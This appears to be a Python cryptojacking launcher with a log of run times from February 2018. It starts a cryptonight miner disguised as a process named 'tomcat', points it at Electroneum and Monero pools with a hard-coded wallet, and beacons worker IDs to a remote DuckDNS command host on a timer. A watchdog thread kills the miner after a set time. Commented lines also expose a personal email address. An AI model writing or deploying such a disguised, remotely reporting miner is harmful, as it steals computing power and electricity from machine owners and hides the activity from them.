import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:07.010699
#2018-02-17 17:07:07.338017
#2018-02-17 18:56:06.812832
#2018-02-17 20:44:05.869911
#2018-02-17 22:31:05.051415
#2018-02-18 00:14:05.545803
#2018-02-18 02:06:01.818168
#2018-02-18 03:53:03.237116
#2018-02-18 05:39:05.691321
#2018-02-18 07:32:04.273392
#2018-02-18 09:20:07.072333
#2018-02-18 11:06:06.211545
#2018-02-18 12:53:04.991311
#2018-02-18 14:41:03.929729
#2018-02-18 16:30:06.769427
#2018-02-18 18:19:06.495887
#2018-02-18 20:05:02.908985
#2018-02-18 21:52:07.393219
#2018-02-18 23:40:08.672422
#2018-02-19 01:26:06.288536
#2018-02-19 03:15:07.050396
#2018-02-19 05:00:01.556799
#2018-02-19 06:44:07.513770
#2018-02-19 08:34:02.028477
#2018-02-19 10:23:04.353218
#2018-02-19 12:11:01.954934
#2018-02-19 13:58:04.086837
#2018-02-19 15:47:08.676528
#2018-02-19 17:34:04.313681
#2018-02-19 19:22:06.813506
#2018-02-19 21:10:07.201465
#2018-02-19 22:56:04.872993
#2018-02-20 00:41:01.939862
#2018-02-20 02:31:05.093526
#2018-02-20 04:20:08.842838
#2018-02-20 06:04:06.585425
#2018-02-20 07:49:05.110568
#2018-02-20 09:34:08.208632
#2018-02-20 11:18:07.946393
#2018-02-20 13:06:08.038716
#2018-02-20 14:49:08.708716
#2018-02-20 16:31:08.551440
#2018-02-20 18:18:07.589562
#2018-02-20 20:09:07.542901
#2018-02-20 21:56:06.638841
#2018-02-20 23:37:05.091989
#2018-02-21 01:22:07.222066
#2018-02-21 03:11:06.340506
#2018-02-21 04:58:04.344306
#2018-02-21 06:46:07.323350
#2018-02-21 08:32:07.933197
#2018-02-21 10:18:07.066689
#2018-02-21 12:07:10.044741
#2018-02-21 13:55:01.466445
#2018-02-21 15:38:09.478639
#2018-02-21 17:28:08.695741
#2018-02-21 19:16:09.462241
#2018-02-21 21:03:07.811952
#2018-02-21 22:49:03.947252
#2018-02-22 00:43:01.331861
#2018-02-22 02:32:07.434295
#2018-02-22 04:18:04.197588
#2018-02-22 06:03:06.168540
#2018-02-22 07:49:04.094364
#2018-02-22 09:38:01.779570
#2018-02-22 11:22:05.644992
#2018-02-22 13:08:05.880405
#2018-02-22 14:56:03.759095
#2018-02-22 16:41:07.683079
#2018-02-22 18:27:01.653177
#2018-02-22 20:22:03.423506
#2018-02-22 22:08:05.922855
#2018-02-22 23:54:05.999887
#2018-02-23 01:42:01.696717
#2018-02-23 03:28:07.809514
#2018-02-23 05:14:07.222677
#2018-02-23 06:59:03.572891
#2018-02-23 08:48:07.984918
#2018-02-23 11:07:01.960500
#2018-02-23 13:00:01.773213
#2018-02-23 14:44:08.758034
#2018-02-23 16:32:06.002890
#2018-02-23 18:18:05.178002
#2018-02-23 20:02:04.602779
#2018-02-23 21:46:06.079947
#2018-02-23 23:37:04.678691
#2018-02-24 01:26:04.539042
#2018-02-24 03:16:08.512961
#2018-02-24 05:01:06.432947
#2018-02-24 06:49:01.231173
#2018-02-24 08:38:07.317494
#2018-02-24 10:22:03.562941
#2018-02-24 12:17:07.515998
#2018-02-24 14:10:07.844679
#2018-02-24 15:57:02.127572
#2018-02-24 17:51:05.557607
#2018-02-24 19:38:06.799394
#2018-02-24 22:24:02.144450
#2018-02-25 02:36:04.007635
#2018-02-25 06:18:05.882955
#2018-02-25 11:40:08.160493